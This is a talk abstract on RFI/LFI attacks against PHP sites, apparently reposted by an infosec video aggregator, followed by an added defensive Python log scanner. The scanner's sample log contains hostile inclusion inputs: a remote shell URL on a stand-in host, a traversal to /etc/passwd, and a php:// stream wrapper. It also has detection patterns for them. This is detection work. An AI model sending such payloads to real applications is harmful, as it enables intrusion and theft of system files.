Surprisingly, however, RFI/LFI are still considered the underdogs of vulnerabilities. Attractive RFI/LFI attack targets are commonly PHP applications. With more than 77% of today's websites running PHP, RFI should be on every security practitioner's radar, but isn't. Some notorious RFI/LFI examples include Anonymous using RFI bots to attack their targets, and TimThumb, a WordPress add-on vulnerable to LFI which paved the way to 1.2 million infected websites.

It's time to seriously examine RFI/LFI attacks. In this talk we quantify the prevalence of this attack based on our observations of it in the wild. We present proofs of concept which demonstrate how these attacks evade detection. We will also present new approaches to defeating this type of attack. In particular, we:

- Introduce the RFI/LFI concepts and evaluate their potential effectiveness in the wild.
- Demonstrate RFI attacks, starting with the basics and moving to recently witnessed advanced schemes which exploit PHP streams.
- Present a proof of concept of how to hide an LFI attack within benign-looking documents such as pictures and PDF documents.
- Reveal a new RFI/LFI attack vector which evades anti-malware by splitting the attack vector across different picture textual fields.
- Provide mitigation steps to defeat RFI/LFI attacks, including a novel approach which uses a shell hosting feed.
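The defensive side of the "shell hosting feed" idea, as an added example that is not part of the talk or its authors' material: a small Python scanner over constructed access-log lines that flags request parameters carrying a remote URL, a PHP stream wrapper or directory traversal, and raises the category to "rfi-feed" when the remote host appears in a placeholder feed of shell-hosting domains (the feed contents and log lines are constructed, not real indicators).

```python
"""Flag RFI/LFI-style request parameters in web access logs."""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed placeholder feed of hosts seen serving web shells (not a real feed).
SHELL_HOSTING_FEED = {"shell-host.example"}

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
SCHEME_RE = re.compile(r"^\s*([a-z][a-z0-9+.-]*)://", re.I)
REMOTE_SCHEMES = {"http", "https", "ftp"}

# Constructed Apache-style log lines: one benign, one RFI from a feed host,
# one traversal (LFI), one PHP stream wrapper, one remote URL not on the feed.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=http://shell-host.example/c.txt HTTP/1.1" 200 90
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1200
10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=php://input HTTP/1.1" 200 40
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=http://mirror.example/news HTTP/1.1" 200 300
"""


def classify_value(value: str) -> Optional[str]:
    """Return 'rfi-feed', 'rfi', 'stream', 'lfi' or None for one parameter value."""
    decoded = unquote(unquote(value))  # also undo double URL-encoding
    m = SCHEME_RE.match(decoded)
    if m:
        scheme = m.group(1).lower()
        if scheme in REMOTE_SCHEMES:
            host = (urlsplit(decoded).hostname or "").lower()
            return "rfi-feed" if host in SHELL_HOSTING_FEED else "rfi"
        return "stream"  # php://, data:// and similar local wrappers
    if TRAVERSAL_RE.search(decoded):
        return "lfi"
    return None


def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (client_ip, parameter_name, category) for each suspicious value."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            category = classify_value(value)
            if category:
                hits.append((client_ip, name, category))
    return hits
```

Feed matches deserve a higher alert priority than a bare remote URL, since the latter can also be a legitimate parameter on some applications.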

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.